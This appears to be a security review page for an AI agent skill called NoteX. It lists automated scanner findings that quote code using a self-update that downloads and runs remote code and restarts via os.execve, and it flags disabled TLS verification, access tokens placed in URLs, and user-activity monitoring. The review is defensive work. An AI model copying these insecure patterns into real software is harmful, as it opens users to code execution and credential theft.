ClawHub

Notex Skills

Security checks across malware telemetry and agentic risk

Overview

The NoteX skill mostly matches its stated product purpose, but it automatically checks for and can install remote code updates while disabling TLS certificate verification.

Review before installing. Use this only if you trust the publisher, the NoteX service, and the cms-auth-skills dependency; prefer a version that removes runtime self-update, enables TLS certificate verification, uses platform-managed signed updates, and clearly warns about tokenized URLs, full-content uploads, OPS user-activity access, and local cache files.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Behavioral ASTexec() Call, eval() Call, Dynamic Import
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (31)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
if platform == "darwin":
            subprocess.Popen(["open", url], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        elif platform == "win32":
            subprocess.Popen(["cmd", "/c", "start", "", url], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        else:
            subprocess.Popen(["xdg-open", url], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return True
Confidence
79% confidence
Finding
subprocess.Popen(["cmd", "/c", "start", "", url], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

os.system() or os exec-family call

High
Category
Dangerous Code Execution
Content
env = os.environ.copy()
    env[SKIP_ENV_NAME] = "1"
    argv = [sys.executable, script_path, *sys.argv[1:]]
    os.execve(sys.executable, argv, env)


def maybe_self_update() -> dict:
Confidence
91% confidence
Finding
os.execve(sys.executable, argv, env)

Lp3

Medium
Category
MCP Least Privilege
Confidence
88% confidence
Finding
The skill declares no permissions, yet its documented behavior clearly requires sensitive capabilities including network access, shell execution, environment access, and file read/write. That mismatch weakens security review and enforcement because operators and policy engines cannot accurately reason about what the skill is allowed to do. In this context, the risk is elevated because the skill handles authentication flows, token-bearing links, script execution, and package installation commands.

Description-Behavior Mismatch

High
Confidence
94% confidence
Finding
The README describes an OPS analytics and monitoring capability that is materially broader than the declared NoteX content/notebook/source/login-gateway scope. Scope drift like this is dangerous because it can introduce privileged operational data access and person-level monitoring features that reviewers, deployers, and users would not reasonably expect from the manifest, undermining least privilege and governance controls.

Context-Inappropriate Capability

Medium
Confidence
91% confidence
Finding
The documented ability to retrieve named users' activity history, profile details, and watchlist status enables employee/user surveillance and access to potentially sensitive behavioral data without a clear purpose limitation in the skill metadata. In the context of a broadly described NoteX skill, this makes unauthorized or excessive personal data access more likely and harder to detect as abnormal.

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
A fallback custom-query capability, even with a whitelist and row cap, significantly expands what the agent can retrieve beyond curated read-only analytics functions. This is dangerous because it can bypass intended abstraction boundaries, expose unexpected sensitive columns or tables, and make policy enforcement dependent on prompt discipline rather than hard technical controls.

Intent-Code Divergence

Low
Confidence
99% confidence
Finding
The helper disables TLS certificate verification for all HTTPS requests while also suppressing the warning, making man-in-the-middle interception feasible. Because this script transmits and later appends authentication tokens to URLs, an attacker on the network path could steal credentials or tamper with API responses.

Context-Inappropriate Capability

Medium
Confidence
93% confidence
Finding
A read-only notebook retrieval script should not modify itself or fetch code updates at runtime. In a skill context, self-update expands the trust boundary from a local utility into arbitrary code acquisition/execution, creating a supply-chain and persistence risk unrelated to the stated functionality.

Context-Inappropriate Capability

Medium
Confidence
91% confidence
Finding
The script executes an external authentication helper via subprocess, which adds code-execution capability beyond simple read operations. Even if intended for SSO/token acquisition, this means the script's behavior depends on another on-disk script that could be replaced, tampered with, or behave unexpectedly in an agent environment.

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
The notebook-writing script reaches outside its stated purpose and executes an external auth skill to obtain an access token, creating a powerful trust boundary crossing. In this skill ecosystem, that is dangerous because a swapped or tampered login.py can execute arbitrary code and return stolen or forged credentials while appearing to perform normal authentication.

Description-Behavior Mismatch

High
Confidence
98% confidence
Finding
The file introduces a shared self-update mechanism that downloads archives, replaces local files, and restarts execution, none of which are justified by the manifest's stated NoteX business functions. That mismatch matters because it hides a powerful code-loading capability inside a content/notes skill, increasing supply-chain and remote execution risk.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
This block implements end-to-end self-updating: remote metadata lookup, ZIP download, extraction, replacement of the installed skill, and exec-based restart. Because the downloaded code becomes the next running version, any compromise of the registry, download endpoint, or network path can result in arbitrary code execution with the skill's privileges.

Context-Inappropriate Capability

Medium
Confidence
93% confidence
Finding
The script imports and later invokes a self-update capability unrelated to index synchronization, expanding its privilege and trust boundary beyond the stated function. In an agent skill context, self-updating code can silently change behavior at runtime, introduce unreviewed logic, or fetch attacker-controlled modifications if the update mechanism is compromised.

Missing User Warnings

High
Confidence
95% confidence
Finding
The skill explicitly instructs the agent to generate and return an authenticated URL containing a live access token in the query string. Query-string tokens are highly exposed through chat transcripts, browser history, logs, screenshots, referrer leakage, and copy/paste sharing, so the absence of a prominent warning or safer delivery mechanism creates a real credential exposure risk.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The persona explicitly advertises access to user behavior, operational indicators, and alerts, including individual history, without any accompanying privacy notice, role restriction, or disclosure of monitoring sensitivity. That omission increases the chance that operators will use the skill for person-level surveillance or data access without understanding the compliance and confidentiality implications.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
Providing example triggers for looking up a named individual's recent operations and logs normalizes person-level monitoring without warning about authorization, privacy, or audit sensitivity. This is dangerous because examples shape operator behavior and can encourage routine access to detailed user activity that may be unnecessary or inappropriate.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The README states that full query traces and results are recorded for audit, but does not clearly disclose this retention to users or limit what is stored. Logging both prompts and returned data can create a secondary repository of sensitive operational and personal information, increasing breach impact and insider access risk.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The skill explicitly instructs the agent to persist fetched notebook/source indexes to a local cache file, and the indexed data contains user-scoped resource identifiers and names. Even if limited to IDs and names, local persistence increases exposure through unauthorized local access, cross-user leakage, stale sensitive metadata retention, and lack of user awareness or consent about data being stored beyond the live request.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
The API explicitly requires transmitting complete original source text for all materials, but provides no guidance on data minimization, privacy review, consent, or handling of sensitive content. In a content-generation gateway, this increases the likelihood that users or integrating agents send confidential, personal, or regulated data to the service unnecessarily, creating privacy and compliance exposure.

Missing User Warnings

Low
Confidence
87% confidence
Finding
The documentation tells clients to send an `access-token` header but gives no warning about secure storage, redaction in logs, or avoiding exposure in examples and error traces. While this is common in API docs, for an agent skill that may be automated and chained through tools, missing credential-handling guidance raises the chance of accidental token leakage.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The documentation explicitly requires uploading complete, unredacted source content together with token-authenticated access, but provides no warning, minimization guidance, or handling constraints for sensitive data. In a notebook/content-ingestion skill, this increases the likelihood that users or agents will send PII, credentials, confidential business data, or copyrighted material wholesale into the service, creating avoidable privacy and data-governance risk.

Missing User Warnings

High
Confidence
95% confidence
Finding
The document explicitly defines an output format that embeds an access token directly in a URL and says the module is allowed to return that full authorization URL. Token-in-URL designs are highly sensitive because URLs can be exposed through logs, browser history, referer headers, screenshots, chat transcripts, and analytics systems, enabling unauthorized reuse of the bearer token.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The documentation explicitly permits returning a full homepage URL containing an authentication token, but it does not warn that the link itself is a bearer credential that can be leaked via logs, browser history, chat transcripts, referrer headers, screenshots, or copy/paste sharing. Because possession of the URL may be sufficient to authenticate as the user, documenting this pattern without strong handling restrictions increases the chance of credential disclosure and session compromise.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
This documentation describes an authenticated external AI chat endpoint that accepts arbitrary user messages but provides no warning about sending potentially sensitive user input to a remote service. In a skill-routing gateway context, operators or downstream agents may assume prompts are local/internal and inadvertently transmit secrets, personal data, or regulated business information to the service.

Missing User Warnings

High
Confidence
99% confidence
Finding
HTTPS requests are made with verify=False while transmitting an access token and potentially sensitive notebook/source data, and certificate warnings are suppressed. This enables man-in-the-middle attacks to intercept credentials or alter API responses, which is especially dangerous in an agent skill handling authenticated content retrieval.

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal